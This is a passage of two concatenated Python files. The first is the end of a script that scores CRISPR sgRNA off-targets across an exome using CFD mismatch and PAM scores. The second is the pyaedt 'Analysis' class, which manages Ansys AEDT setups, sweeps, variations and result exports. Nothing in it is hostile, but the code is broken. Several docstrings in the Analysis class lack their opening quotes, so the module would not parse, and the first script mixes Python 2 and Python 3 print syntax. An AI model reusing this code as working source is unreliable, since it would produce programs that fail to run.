help='WT 23mer sgRNA sequence')
parser.add_argument('--off',
type=str,
help='Off-target 23mer sgRNA sequence')
return parser
#Reverse complements a given string
def revcom(s):
basecomp = {'A': 'T', 'C': 'G', 'G': 'C', 'T': 'A','U':'A'}
letters = list(s[::-1])
letters = [basecomp[base] for base in letters]
return ''.join(letters)
#Unpickle mismatch scores and PAM scores
def get_mm_pam_scores():
try:
mm_scores = pickle.load(open('mismatch_score.pkl','rb'))
pam_scores = pickle.load(open('pam_scores.pkl','rb'))
return (mm_scores,pam_scores)
except:
raise Exception("Could not find file with mismatch scores or PAM scores")
#Calculates CFD score
def calc_cfd(wt,sg,pam):
mm_scores,pam_scores = get_mm_pam_scores()
score = 1
sg = sg.replace('T','U')
wt = wt.replace('T','U')
s_list = list(sg)
wt_list = list(wt)
for i,sl in enumerate(s_list):
if wt_list[i] == sl:
score*=1
else:
key = 'r'+wt_list[i]+':d'+revcom(sl)+','+str(i+1)
score*= mm_scores[key]
score*=pam_scores[pam]
return (score)
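# Illustrative usage (hypothetical sequences; the pickle score files must be present):
#   wt = "AGTCTGAGTCGGAGCCAGGGCGG"   # 20mer protospacer + NGG PAM
#   off = "AGTCTGAGTCGGAGCCAGGA"     # 20mer off-target protospacer
#   cfd = calc_cfd(wt, off, "GG")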
def get_pot_off_targets(seq):
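# Enumerate every sequence that differs from `seq` at up to three positions
# (the unchanged input sequence itself is dropped from the result).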
seq_list = list(seq)
backup_seq_list = list(seq)
nts = ['A','T','C','G']
results = {}
for a in range(len(seq)):
for a_sym in nts:
seq_list[a] = a_sym
for b in range(a + 1, len(seq)):
for b_sym in nts:
seq_list[b] = b_sym
for c in range(b + 1, len(seq)):
for c_sym in nts:
seq_list[c] = c_sym
new_seq = ''.join(seq_list)
results[new_seq] = True
seq_list[c] = backup_seq_list[c]
seq_list[b] = backup_seq_list[b]
seq_list[a] = backup_seq_list[a]
if seq in results:
del results[seq]
return results.keys()
# parallel process container
manager = Manager()
off_target_scores = manager.dict()
# collect every 20-mer protospacer from the exome that is followed by an NGG PAM
print "preparing hum kmers"
with open(exome_path_hum, 'r') as input:
exome = input.read()
exome_mers = {}
for i in range(len(exome) - mer_len - 3):
s = exome[i:i + mer_len]
if exome[i + mer_len + 1 : i + mer_len + 3] != "GG": # only PAMs
continue
if '=' in s or 'N' in s:
continue
if s in off_target_scores:
off_target_scores[s] = 'inf'
continue
off_target_scores[s] = 0
if s in exome_mers:
exome_mers[s] += 1
else:
exome_mers[s] = 1
# Parallelize
def process_core(pid, results, protospacers):
i = 0
for protospacer in protospacers:
i += 1
if i % 10000 == 0: print(i, 'pid = ', pid)
score = 0
off_targets = get_pot_off_targets(protospacer)
for off_target in off_targets:
if off_target in exome_mers:
wt = protospacer + "CGG"
sg = off_target
pam = "GG"
score += exome_mers[off_target] * calc_cfd(wt, sg, pam)
off_target_scores[protospacer] = score
# throw onto cores
print('throwing onto cores')
processes = []
exome_mers_keys = list(exome_mers.keys())
unit = len(exome_mers_keys) // NUM_CORES + 1
print('unit is', unit)
for i in range(NUM_CORES):
start = unit * i
end = min(unit * (i + 1), len(exome_mers_keys))
protospacers = exome_mers_keys[start:end]
p = Process(target = process_core, args=(i, off_target_scores, protospacers,))
processes.append(p)
for process in processes:
process.start()
for process in processes:
process.join()
print('writing results')
if __name__ == '__main__':
with open("off_target_scores.p", "wb") as output:
pickle.dump(dict(off_target_scores), output)
print('done')
|
Analysis.py
|
"""
This module contains the ``analysis`` class.
It includes common classes for file management and messaging and all
calls to AEDT modules like the modeler, mesh, postprocessing, and setup.
"""
from __future__ import absolute_import
import os
import shutil
import threading
import warnings
from collections import OrderedDict
from pyaedt.generic.general_methods import aedt_exception_handler, generate_unique_name
from pyaedt.generic.constants import (
AXIS,
PLANE,
GRAVITY,
VIEW,
SOLUTIONS,
SETUPS,
CoordinateSystemPlane,
CoordinateSystemAxis,
Plane,
GravityDirection,
)
from pyaedt.modules.Boundary import NativeComponentObject
from pyaedt.modules.DesignXPloration import (
DOESetups,
DXSetups,
OptimizationSetups,
ParametericsSetups,
SensitivitySetups,
StatisticalSetups,
)
from pyaedt.modules.MaterialLib import Materials
from pyaedt.modules.SolveSetup import Setup
from pyaedt.application.Design import Design
from pyaedt.application.JobManager import update_hpc_option
class Analysis(Design, object):
"""Contains all common analysis functions.
This class is inherited by the calling application and is accessible through it (e.g. ``hfss.method_name``).
It is automatically initialized by a call from an application, such as HFSS or Q3D.
See the application function for its parameter descriptions.
Parameters
----------
application : str
Application that is to initialize the call.
projectname : str
Name of the project to select or the full path to the project
or AEDTZ archive to open.
designname : str
Name of the design to select.
solution_type : str
Solution type to apply to the design.
setup_name : str
Name of the setup to use as the nominal.
specified_version : str
Version of AEDT to use.
non_graphical : bool
Whether to run AEDT in the non-graphical mode.
new_desktop_session : bool
Whether to launch an instance of AEDT in a new thread, even if
another instance of the ``specified_version`` is active on the
machine.
close_on_exit : bool
Whether to release AEDT on exit.
student_version : bool
Whether to enable the student version of AEDT.
"""
def __init__(
self,
application,
projectname,
designname,
solution_type,
setup_name,
specified_version,
non_graphical,
new_desktop_session,
close_on_exit,
student_version,
):
self.setups = []
Design.__init__(
self,
application,
projectname,
designname,
solution_type,
specified_version,
non_graphical,
new_desktop_session,
close_on_exit,
student_version,
)
self.logger.info("Design Loaded")
self._setup = None
if setup_name:
self.analysis_setup = setup_name
self.solution_type = solution_type
self._materials = Materials(self)
self.logger.info("Materials Loaded")
self._available_variations = self.AvailableVariations(self)
if "HFSS 3D Layout Design" in self.design_type:
self._oanalysis = self._odesign.GetModule("SolveSetups")
elif "EMIT" in self.design_type or "Maxwell Circuit" in self.design_type:
self._oanalysis = None
elif "Circuit Design" in self.design_type or "Twin Builder" in self.design_type:
self._oanalysis = self._odesign.GetModule("SimSetup")
else:
self._oanalysis = self._odesign.GetModule("AnalysisSetup")
if self.design_type != "Maxwell Circuit":
self._ooptimetrics = self._odesign.GetModule("Optimetrics")
self._ooutput_variable = self._odesign.GetModule("OutputVariable")
self.setups = [self.get_setup(setup_name) for setup_name in self.setup_names]
self.opti_parametric = ParametericsSetups(self)
self.opti_optimization = OptimizationSetups(self)
self.opti_doe = DOESetups(self)
self.opti_designxplorer = DXSetups(self)
self.opti_sensitivity = SensitivitySetups(self)
self.opti_statistical = StatisticalSetups(self)
self.native_components = self._get_native_data()
self.SOLUTIONS = SOLUTIONS()
self.SETUPS = SETUPS()
self.AXIS = AXIS()
self.PLANE = PLANE()
self.VIEW = VIEW()
self.GRAVITY = GRAVITY()
@property
def ooptimetrics(self):
"""Optimetrics AEDT Module.
References
----------
>>> oDesign.GetModule("Optimetrics")
"""
return self._ooptimetrics
@property
def ooutput_variable(self):
"""Output Variable AEDT Module.
References
----------
>>> oDesign.GetModule("OutputVariable")
"""
return self._ooutput_variable
@property
def oanalysis(self):
"""Analysis AEDT Module.
References
----------
>>> oDesign.GetModule("SolveSetups")
>>> oDesign.GetModule("SimSetup")
>>> oDesign.GetModule("AnalysisSetup")
"""
return self._oanalysis
@property
def output_variables(self):
"""List of Output variables.
Returns
-------
list of str
References
----------
>>> oModule.GetOutputVariables()
"""
return self.ooutput_variable.GetOutputVariables()
@property
def materials(self):
"""Manages materials in the project.
Returns
-------
:class:`pyaedt.modules.MaterialLib.Materials`
Manages materials in the project.
"""
return self._materials
@property
def Position(self):
"""Position of the object.
Returns
-------
type
Position object.
"""
return self.modeler.Position
@property
def available_variations(self):
"""Available variation object.
Returns
-------
:class:`pyaedt.application.Analysis.Analysis.AvailableVariations`
Available variation object.
"""
return self._available_variations
@property
def CoordinateSystemAxis(self):
"""Coordinate system axis constant.
.. deprecated:: 0.4.8
Use :attr:`AXIS` instead.
Returns
-------
:class:`pyaedt.modeler.constants.AXIS`
Coordinate system axis constants tuple (.X, .Y, .Z).
"""
return CoordinateSystemAxis()
@property
def CoordinateSystemPlane(self):
"""Coordinate system plane constants.
.. deprecated:: 0.4.8
Use :attr:`PLANE` instead.
Returns
-------
:class:`pyaedt.modeler.constants.PLANE`
Coordinate system plane constants tuple (.XY, .YZ, .XZ).
"""
return CoordinateSystemPlane()
@property
def View(self):
"""Planes.
.. deprecated:: 0.4.8
Use :attr:`VIEW` instead.
Returns
-------
:class:`pyaedt.modeler.constants.PLANE`
Coordinate system plane string tuple ("XY", "YZ", "XZ").
"""
return Plane()
@property
def GravityDirection(self):
"""Gravity direction.
.. deprecated:: 0.4.8
Use :attr:`GRAVITY` instead.
Returns
-------
tuple
Gravity direction tuple (XNeg, YNeg, ZNeg, XPos, YPos, ZPos).
"""
return GravityDirection()
@property
def modeler(self):
"""Modeler.
Returns
-------
:class:`pyaedt.modeler.Modeler.Modeler`
Modeler object.
"""
return self._modeler
@property
def mesh(self):
"""Mesh.
Returns
-------
:class:`pyaedt.modules.Mesh.Mesh`
Mesh object.
"""
return self._mesh
@property
def post(self):
"""PostProcessor.
Returns
-------
:class:`pyaedt.modules.AdvancedPostProcessing.PostProcessor`
PostProcessor object.
"""
return self._post
@property
def analysis_setup(self):
"""Analysis setup.
Returns
-------
str
Name of the active or first analysis setup.
References
----------
>>> oModule.GetAllSolutionSetups()
"""
if self._setup:
return self._setup
elif self.existing_analysis_setups:
return self.existing_analysis_setups[0]
else:
self._setup = None
return self._setup
@analysis_setup.setter
def analysis_setup(self, setup_name):
setup_list = self.existing_analysis_setups
if setup_list:
assert setup_name in setup_list, "Invalid setup name {}".format(setup_name)
self._setup = setup_name
else:
# No existing setups to validate against; keep the requested name as-is.
self._setup = setup_name
@property
def existing_analysis_sweeps(self):
"""Existing analysis sweeps.
Returns
-------
list of str
List of all analysis sweeps in the design.
References
----------
>>> oModule.GetAllSolutionNames
>>> oModule.GetSweeps
"""
setup_list = self.existing_analysis_setups
sweep_list = []
if self.solution_type == "HFSS3DLayout" or self.solution_type == "HFSS 3D Layout Design":
sweep_list = self.oanalysis.GetAllSolutionNames()
sweep_list = [i for i in sweep_list if "Adaptive Pass" not in i]
sweep_list.reverse()
else:
for el in setup_list:
if self.solution_type == "HFSS3DLayout" or self.solution_type == "HFSS 3D Layout Design":
sweeps = self.oanalysis.GetAllSolutionNames()
else:
setuptype = self.design_solutions.default_adaptive
if setuptype:
sweep_list.append(el + " : " + setuptype)
try:
sweeps = list(self.oanalysis.GetSweeps(el))
except:
sweeps = []
for sw in sweeps:
sweep_list.append(el + " : " + sw)
return sweep_list
@property
def nominal_adaptive(self):
"""Nominal adaptive sweep.
Returns
-------
str
Name of the nominal adaptive sweep.
References
----------
>>> oModule.GetAllSolutionNames
>>> oModule.GetSweeps
"""
if len(self.existing_analysis_sweeps) > 0:
return self.existing_analysis_sweeps[0]
else:
return ""
@property
def nominal_sweep(self):
"""Nominal sweep.
Returns
-------
str
Name of the first sweep after the adaptive solution if one is available,
otherwise the name of the nominal adaptive sweep.
References
----------
>>> oModule.GetAllSolutionNames
>>> oModule.GetSweeps
"""
if len(self.existing_analysis_sweeps) > 1:
return self.existing_analysis_sweeps[1]
else:
return self.nominal_adaptive
@property
def existing_analysis_setups(self):
"""Existing analysis setups.
Returns
-------
list of str
List of all analysis setups in the design.
References
----------
>>> oModule.GetSetups
"""
setups = list(self.oanalysis.GetSetups())
return setups
@property
def setup_names(self):
"""Setup names.
Returns
-------
list of str
List of names of all analysis setups in the design.
References
----------
>>> oModule.GetSetups
"""
return self.oanalysis.GetSetups()
@property
def SimulationSetupTypes(self):
"""Simulation setup types.
Returns
-------
SETUPS
List of all simulation setup types categorized by application.
"""
return SETUPS()
@property
def SolutionTypes(self):
"""Solution types.
Returns
-------
SOLUTIONS
List of all solution type categorized by application.
"""
return SOLUTIONS()
@aedt_exception_handler
def get_excitations_name(self):
"""Get all excitation names.
Returns
-------
list
List of excitation names. Excitations with multiple modes will return one
excitation for each mode.
References
----------
>>> oModule.GetExcitations
"""
try:
list_names = list(self.oboundary.GetExcitations())
del list_names[1::2]
return list_names
except:
return []
@aedt_exception_handler
def analyze_all(self):
Analyze all setups in the active design.
Returns
-------
bool
``True`` when simulation is finished.
"""
self.odesign.AnalyzeAll()
return True
@aedt_exception_handler
def list_of_variations(self, setup_name=None, sweep_name=None):
Return the list of active variations for the given setup and sweep.
Parameters
----------
setup_name : str, optional
Setup name. If ``None``, the nominal adaptive setup is used.
sweep_name : str, optional
Sweep name. If ``None``, the nominal adaptive sweep is used.
Returns
-------
list
References
----------
>>> oModule.ListVariations
"""
if not setup_name and ":" in self.nominal_sweep:
setup_name = self.nominal_adaptive.split(":")[0].strip()
elif not setup_name:
self.logger.warning("No Setup defined.")
return False
if not sweep_name and ":" in self.nominal_sweep:
sweep_name = self.nominal_adaptive.split(":")[1].strip()
elif not sweep_name:
self.logger.warning("No Sweep defined.")
return False
if self.solution_type == "HFSS3DLayout" or self.solution_type == "HFSS 3D Layout Design":
try:
return list(self.osolution.ListVariations("{0} : {1}".format(setup_name, sweep_name)))
except:
return [""]
else:
try:
return list(self.odesign.ListVariations("{0} : {1}".format(setup_name, sweep_name)))
except:
return [""]
@aedt_exception_handler
def export_results(self, analyze=False, export_folder=None):
Export all available reports to file, including Touchstone (sNp), profile, and convergence data.
Parameters
----------
analyze : bool, optional
Whether to run the analysis before exporting. Solutions must be present in the design.
export_folder : str, optional
Full path to the output folder. If ``None``, the working directory is used.
Returns
-------
list
List of all exported files.
References
----------
>>> oModule.GetAllPortsList
>>> oDesign.ExportProfile
>>> oModule.ExportToFile
>>> oModule.ExportConvergence
>>> oModule.ExportNetworkData
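Examples
--------
Illustrative sketch; assumes a solved HFSS design is open as ``hfss``.
>>> exported_files = hfss.export_results()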
"""
exported_files = []
if not export_folder:
export_folder = self.working_directory
if analyze:
self.analyze_all()
setups = self.oanalysis.GetSetups()
if self.solution_type == "HFSS3DLayout" or self.solution_type == "HFSS 3D Layout Design":
excitations = len(self.oexcitation.GetAllPortsList())
else:
excitations = self.oboundary.GetNumExcitations()
reportnames = self.post.oreportsetup.GetAllReportNames()
for report_name in reportnames:
name_no_space = report_name.replace(" ", "_")
self.post.oreportsetup.UpdateReports([str(report_name)])
export_path = os.path.join(
export_folder, "{0}_{1}_{2}.csv".format(self.project_name, self.design_name, name_no_space)
)
self.post.oreportsetup.ExportToFile(str(report_name), export_path)
self.logger.info("Export Data: {}".format(export_path))
exported_files.append(export_path)
for s in setups:
sweeps = self.oanalysis.GetSweeps(s)
if len(sweeps) == 0:
sweeps = ["LastAdaptive"]
else:
pass
for sweep in sweeps:
variation_array = self.list_of_variations(s, sweep)
if len(variation_array) == 1:
export_path = os.path.join(export_folder, "{}.prof".format(self.project_name))
result = self.export_profile(s, variation_array[0], export_path)
if result:
exported_files.append(export_path)
export_path = os.path.join(export_folder, "{}.conv".format(self.project_name))
result = self.export_convergence(s, variation_array[0], export_path)
if result:
exported_files.append(export_path)
if self.solution_type in ["HFSS3DLayout", "HFSS 3D Layout Design", "HFSS", "Circuit"]:
try:
export_path = os.path.join(
export_folder, "{0}.s{1}p".format(self.project_name, excitations)
)
self.osolution.ExportNetworkData(
variation_array[0],
["{0}:{1}".format(s, sweep)],
3,
export_path,
["All"],
True,
50,
"S",
-1,
0,
15,
True,
False,
False,
)
exported_files.append(export_path)
self.logger.info("Exported Touchstone: %s", export_path)
except:
self.logger.warning("Export SnP failed: no solutions found")
else:
varCount = 0
for variation in variation_array:
varCount += 1
export_path = os.path.join(export_folder, "{0}_{1}.prof".format(self.project_name, varCount))
result = self.export_profile(s, variation, export_path)
if result:
exported_files.append(export_path)
export_path = os.path.join(export_folder, "{0}_{1}.conv".format(self.project_name, varCount))
self.logger.info("Export Convergence: %s", export_path)
result = self.export_convergence(s, variation, export_path)
if result:
exported_files.append(export_path)
if self.solution_type in ["HFSS3DLayout", "HFSS 3D Layout Design", "HFSS", "Circuit"]:
try:
export_path = os.path.join(
export_folder, "{0}_{1}.s{2}p".format(self.project_name, varCount, excitations)
)
self.logger.info("Export SnP: {}".format(export_path))
self.osolution.ExportNetworkData(
variation,
["{0}:{1}".format(s, sweep)],
3,
export_path,
["All"],
True,
50,
"S",
-1,
0,
15,
True,
False,
False,
)
exported_files.append(export_path)
self.logger.info("Exported Touchstone: %s", export_path)
except:
self.logger.warning("Export SnP failed: no solutions found")
return exported_files
@aedt_exception_handler
def export_convergence(self, setup_name, variation_string="", file_path=None):
"""Export a solution convergence to file.
Parameters
----------
setup_name : str
Setup name, for example ``'Setup1'``.
variation_string : str
Variation string with values, for example ``'radius=3mm'``.
file_path : str, optional
Full path to the output file. If ``None``, the working directory is used.
Returns
-------
str
File path if created.
References
----------
>>> oModule.ExportConvergence
"""
if not file_path:
file_path = os.path.join(self.working_directory, generate_unique_name("Convergence") + ".prop")
self.odesign.ExportConvergence(setup_name, variation_string, file_path)
self.logger.info("Export Convergence to %s", file_path)
return file_path
@aedt_exception_handler
def _get_native_data(self):
"""Retrieve Native Components data."""
boundaries = []
try:
data_vals = self.design_properties["ModelSetup"]["GeometryCore"]["GeometryOperations"][
"SubModelDefinitions"
]["NativeComponentDefinition"]
if not isinstance(data_vals, list) and isinstance(data_vals, (OrderedDict, dict)):
boundaries.append(
NativeComponentObject(
self,
data_vals["NativeComponentDefinitionProvider"]["Type"],
data_vals["BasicComponentInfo"]["ComponentName"],
data_vals,
)
)
for ds in data_vals:
try:
if isinstance(ds, (OrderedDict, dict)):
boundaries.append(
NativeComponentObject(
self,
ds["NativeComponentDefinitionProvider"]["Type"],
ds["BasicComponentInfo"]["ComponentName"],
ds,
)
)
except:
pass
except:
pass
return boundaries
class AvailableVariations(object):
def __init__(self, app):
"""Contains available variations.
Parameters
----------
app :
Inherited parent object.
Returns
-------
object
Parent object.
"""
self._app = app
@property
def variables(self):
"""Variables.
Returns
-------
list of str
List of names of independent variables.
"""
return [i for i in self._app.variable_manager.independent_variables]
@aedt_exception_handler
def variations(self, setup_sweep=None):
"""Variations.
Parameters
----------
setup_sweep : str, optional
Setup name with the sweep to search for variations on. The default is ``None``.
Returns
-------
list of lists
List of variation families.
References
----------
>>> oModule.GetAvailableVariations
"""
if not setup_sweep:
setup_sweep = self._app.existing_analysis_sweeps[0]
vs = self._app.osolution.GetAvailableVariations(setup_sweep)
families = []
for v in vs:
variations = v.split(" ")
family = []
for el in self.variables:
family.append(el + ":=")
i = 0
while i < len(variations):
if variations[i][0 : len(el)] == el:
family.append([variations[i][len(el) + 2 : -1]])
i += 1
families.append(family)
return families
@aedt_exception_handler
def get_variation_strings(self, setup_sweep=None):
"""Return variation strings.
Parameters
----------
setup_sweep : str, optional
Setup name with the sweep to search for variations on. The default is ``None``.
Returns
-------
list of str
List of variation families.
References
----------
>>> oModule.GetAvailableVariations
"""
if not setup_sweep:
setup_sweep = self._app.existing_analysis_sweeps[0]
return self._app.osolution.GetAvailableVariations(setup_sweep)
@property
def nominal(self):
"""Nominal."""
families = []
for el in self.variables:
families.append(el + ":=")
families.append(["Nominal"])
return families
@property
def nominal_w_values(self):
"""Nominal with values.
References
----------
>>> oDesign.GetChildObject('Variables').GetChildNames
>>> oDesign.GetVariables
>>> oDesign.GetVariableValue
>>> oDesign.GetNominalVariation"""
families = []
if self._app.design_type == "HFSS 3D Layout Design":
if self._app._is_object_oriented_enabled():
listvar = list(self._app._odesign.GetChildObject("Variables").GetChildNames())
else:
listvar = list(self._app._odesign.GetVariables())
for el in listvar:
families.append(el + ":=")
families.append([self._app._odesign.GetVariableValue(el)])
else:
variation = self._app._odesign.GetNominalVariation()
for el in self.variables:
families.append(el + ":=")
families.append([self._app._odesign.GetVariationVariableValue(variation, el)])
return families
@property
def nominal_w_values_dict(self):
"""Nominal with values in a dictionary.
References
----------
>>> oDesign.GetChildObject('Variables').GetChildNames
>>> oDesign.GetVariables
>>> oDesign.GetVariableValue
>>> oDesign.GetNominalVariation"""
families = {}
if self._app.design_type == "HFSS 3D Layout Design":
if self._app._is_object_oriented_enabled():
listvar = list(self._app._odesign.GetChildObject("Variables").GetChildNames())
else:
listvar = list(self._app._odesign.GetVariables())
for el in listvar:
families[el] = self._app._odesign.GetVariableValue(el)
else:
variation = self._app._odesign.GetNominalVariation()
for el in self.variables:
families[el] = self._app._odesign.GetVariationVariableValue(variation, el)
return families
@property
def all(self):
"""All."""
families = []
for el in self.variables:
families.append(el + ":=")
families.append(["All"])
return families
class AxisDir(object):
"""Contains constants for the axis directions."""
(XNeg, YNeg, ZNeg, XPos, YPos, ZPos) = range(0, 6)
@aedt_exception_handler
def get_setups(self):
"""Retrieve setups.
Returns
-------
list of str
List of names of all setups.
References
----------
>>> oModule.GetSetups
"""
setups = self.oanalysis.GetSetups()
return list(setups)
@aedt_exception_handler
def get_nominal_variation(self):
"""Retrieve the nominal variation.
Returns
-------
list of str
List of nominal variations.
"""
return self.available_variations.nominal
@aedt_exception_handler
def get_sweeps(self, name):
"""Retrieve all sweep for a setup.
Parameters
----------
name : str
Name of the setup.
Returns
-------
list of str
List of names of all sweeps for the setup.
References
----------
>>> oModule.GetSweeps
"""
sweeps = self.oanalysis.GetSweeps(name)
return list(sweeps)
@aedt_exception_handler
def export_parametric_results(self, sweepname, filename, exportunits=True):
"""Export a list of all parametric variations solved for a sweep to a CSV file.
Parameters
----------
sweepname : str
Name of the optimetrics sweep.
filename : str
Full path and name for the CSV file.
exportunits : bool, optional
Whether to export units with the value. The default is ``True``. When ``False``,
only the value is exported.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oModule.ExportParametricResults
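Examples
--------
Illustrative sketch; the sweep name and output path are placeholders.
>>> hfss.export_parametric_results("ParametricSetup1", "C:/temp/variations.csv")
True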
"""
self.ooptimetrics.ExportParametricResults(sweepname, filename, exportunits)
return True
@aedt_exception_handler
def analyze_from_initial_mesh(self):
"""Revert the solution to the initial mesh and re-run the solve.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oModule.RevertSetupToInitial
>>> oDesign.Analyze
"""
self.oanalysis.RevertSetupToInitial(self._setup)
self.analyze_nominal()
return True
@aedt_exception_handler
def analyse_nominal(self):
"""Solve the nominal design.
.. deprecated:: 0.4.0
Use :func:`Analysis.analyze_nominal` instead.
"""
warnings.warn("`analyse_nominal` is deprecated. Use `analyze_nominal` instead.", DeprecationWarning)
self.analyze_nominal()
@aedt_exception_handler
def analyze_nominal(self, num_cores=None, num_tasks=None, num_gpu=None, acf_file=None):
"""Solve the nominal design.
Parameters
----------
num_cores : int, optional
Number of Simulation cores.
num_tasks : int, optional
Number of Simulation tasks.
num_gpu : int, optional
Number of Simulation Gpu to use.
acf_file : str, optional
Full path to custom acf_file.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oDesign.Analyze
"""
return self.analyze_setup(self.analysis_setup, num_cores, num_tasks, num_gpu, acf_file)
@aedt_exception_handler
def generate_unique_setup_name(self, setup_name=None):
Generate a new setup with a unique name.
Parameters
----------
setup_name : str, optional
Name of the setup. The default is ``None``.
Returns
-------
str
Name of the setup.
"""
if not setup_name:
setup_name = "Setup"
index = 2
while setup_name in self.existing_analysis_setups:
setup_name = setup_name + "_{}".format(index)
index += 1
return setup_name
@aedt_exception_handler
def create_setup(self, setupname="MySetupAuto", setuptype=None, props={}):
"""Create a setup.
Parameters
----------
setupname : str, optional
Name of the setup. The default is ``"MySetupAuto"``.
setuptype : optional
Type of the setup. The default is ``None``, in which case
the default type is applied.
props : dict, optional
Dictionary of analysis properties appropriate for the design and analysis.
If no values are passed, default values will be used.
Returns
-------
:class:`pyaedt.modules.SolveSetup.Setup`
References
----------
>>> oModule.InsertSetup
Examples
--------
Create a setup for SBR+ setup using advanced Doppler
processing for automotive radar.
>>> import pyaedt
>>> hfss = pyaedt.Hfss(solution_type='SBR+')
>>> setup1 = hfss.create_setup(setupname='Setup1')
>>> setup1.props["IsSbrRangeDoppler"] = True
>>> setup1.props["SbrRangeDopplerTimeVariable"] = "time_var"
>>> setup1.props["SbrRangeDopplerCenterFreq"] = "76.5GHz"
>>> setup1.props["SbrRangeDopplerRangeResolution"] = "0.15meter"
>>> setup1.props["SbrRangeDopplerRangePeriod"] = "100meter"
>>> setup1.props["SbrRangeDopplerVelocityResolution"] = "0.2m_per_sec"
>>> setup1.props["SbrRangeDopplerVelocityMin"] = "-30m_per_sec"
>>> setup1.props["SbrRangeDopplerVelocityMax"] = "30m_per_sec"
>>> setup1.props["DopplerRayDensityPerWavelength"] = "0.2"
>>> setup1.props["MaxNumberOfBounces"] = "3"
>>> setup1.update()
...
pyaedt info: Sweep was created correctly.
"""
if setuptype is None:
setuptype = self.design_solutions.default_setup
name = self.generate_unique_setup_name(setupname)
setup = Setup(self, setuptype, name)
if self.design_type == "HFSS" and not self.get_excitations_name() and "MaxDeltaS" in setup.props:
new_dict = OrderedDict()
for k, v in setup.props.items():
if k == "MaxDeltaS":
new_dict["MaxDeltaE"] = 0.01
else:
new_dict[k] = v
setup.props = new_dict
setup.create()
if props:
for el in props:
setup.props[el] = props[el]
setup.update()
self.analysis_setup = name
self.setups.append(setup)
return setup
@aedt_exception_handler
def delete_setup(self, setupname):
"""Delete a setup.
Parameters
----------
setupname : str
Name of the setup.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oModule.DeleteSetups
Examples
--------
Create a setup and then delete it.
>>> import pyaedt
>>> hfss = pyaedt.Hfss()
>>> setup1 = hfss.create_setup(setupname='Setup1')
>>> hfss.delete_setup(setupname='Setup1')
...
pyaedt info: Sweep was deleted correctly.
"""
if setupname in self.existing_analysis_setups:
self.oanalysis.DeleteSetups([setupname])
for s in self.setups:
if s.name == setupname:
self.setups.remove(s)
return True
return False
@aedt_exception_handler
def edit_setup(self, setupname, properties_dict):
"""Modify a setup.
Parameters
----------
setupname : str
Name of the setup.
properties_dict : dict
Dictionary containing the property to update with the value.
Returns
-------
:class:`pyaedt.modules.SolveSetup.Setup`
References
----------
>>> oModule.EditSetup
"""
setuptype = self.design_solutions.default_setup
setup = Setup(self, setuptype, setupname, isnewsetup=False)
setup.update(properties_dict)
self.analysis_setup = setupname
return setup
@aedt_exception_handler
def get_setup(self, setupname):
"""Get the setup from the current design.
Parameters
----------
setupname : str
Name of the setup.
Returns
-------
:class:`pyaedt.modules.SolveSetup.Setup`
"""
setuptype = self.design_solutions.default_setup
setup = Setup(self, setuptype, setupname, isnewsetup=False)
if setup.props:
self.analysis_setup = setupname
return setup
@aedt_exception_handler
def create_output_variable(self, variable, expression):
"""Create or modify an output variable.
Parameters
----------
variable : str
Name of the variable.
expression :
Value for the variable.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oModule.CreateOutputVariable
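Examples
--------
Illustrative sketch; the expression is only a placeholder.
>>> hfss.create_output_variable("OutputVariable1", "dB(S(1,1))")
True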
"""
oModule = self.ooutput_variable
if variable in self.output_variables:
oModule.EditOutputVariable(
variable, expression, variable, self.existing_analysis_sweeps[0], self.solution_type, []
)
else:
oModule.CreateOutputVariable(variable, expression, self.existing_analysis_sweeps[0], self.solution_type, [])
return True
@aedt_exception_handler
def get_output_variable(self, variable):
"""Retrieve the value of the output variable.
Parameters
----------
variable : str
Name of the variable.
Returns
-------
type
Value of the output variable.
References
----------
>>> oDesign.GetNominalVariation
>>> oModule.GetOutputVariableValue
"""
assert variable in self.output_variables, "Output variable {} does not exist.".format(variable)
nominal_variation = self.odesign.GetNominalVariation()
sol_type = self.solution_type
value = self.ooutput_variable.GetOutputVariableValue(
variable, nominal_variation, self.existing_analysis_sweeps[0], self.solution_type, []
)
return value
@aedt_exception_handler
def get_object_material_properties(self, object_list=None, prop_names=None):
"""Retrieve the material properties for a list of given objects and return them in a dictionary.
This high-level function ignores objects with no defined material properties.
Parameters
----------
object_list : list, optional
List of objects for which to get material_properties. The default is ``None``,
in which case all objects are considered.
prop_names : str or list
The property or list of properties to export. The default is ``None``, in
which case all properties are exported.
Returns
-------
dict
Dictionary of objects with material properties.
"""
if object_list:
if not isinstance(object_list, list):
object_list = [object_list]
else:
object_list = self.modeler.primitives.object_names
if prop_names:
if not isinstance(prop_names, list):
prop_names = [prop_names]
props_dict = {}
for entry in object_list:
mat_name = self.modeler.primitives[entry].material_name
mat_props = self._materials[mat_name]
if prop_names is None:
props_dict[entry] = mat_props._props
else:
props_dict[entry] = {}
for prop_name in prop_names:
props_dict[entry][prop_name] = mat_props._props[prop_name]
return props_dict
@aedt_exception_handler
def analyze_setup(self, name, num_cores=None, num_tasks=None, num_gpu=None, acf_file=None):
"""Analyze a specific design setup.
Parameters
----------
name : str
Name of the setup, which can be an optimetric setup or a simple setup.
num_cores : int, optional
Number of Simulation cores.
num_tasks : int, optional
Number of Simulation tasks.
num_gpu : int, optional
Number of Simulation Gpu to use.
acf_file : str, optional
Full path to custom acf_file.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oDesign.Analyze
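Examples
--------
Illustrative sketch; assumes an existing setup named ``Setup1``.
>>> hfss.analyze_setup("Setup1", num_cores=4)
True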
"""
set_custom_dso = False
active_config = self._desktop.GetRegistryString(r"Desktop/ActiveDSOConfigurations/" + self.design_type)
if acf_file:
self._desktop.SetRegistryFromFile(acf_file)
name = ""
with open(acf_file, "r") as f:
lines = f.readlines()
for line in lines:
if "ConfigName" in line:
name = line.strip().split("=")[1]
break
if name:
try:
self.set_registry_key(r"Desktop/ActiveDSOConfigurations/" + self.design_type, name)
set_custom_dso = True
except:
pass
elif num_gpu or num_tasks or num_cores:
config_name = "pyaedt_config"
source_name = os.path.join(self.pyaedt_dir, "misc", "pyaedt_local_config.acf")
target_name = os.path.join(self.working_directory, config_name + ".acf")
shutil.copy2(source_name, target_name)
if num_cores:
update_hpc_option(target_name, "NumCores", num_cores, False)
if num_gpu:
update_hpc_option(target_name, "NumGPUs", num_gpu, False)
if num_tasks:
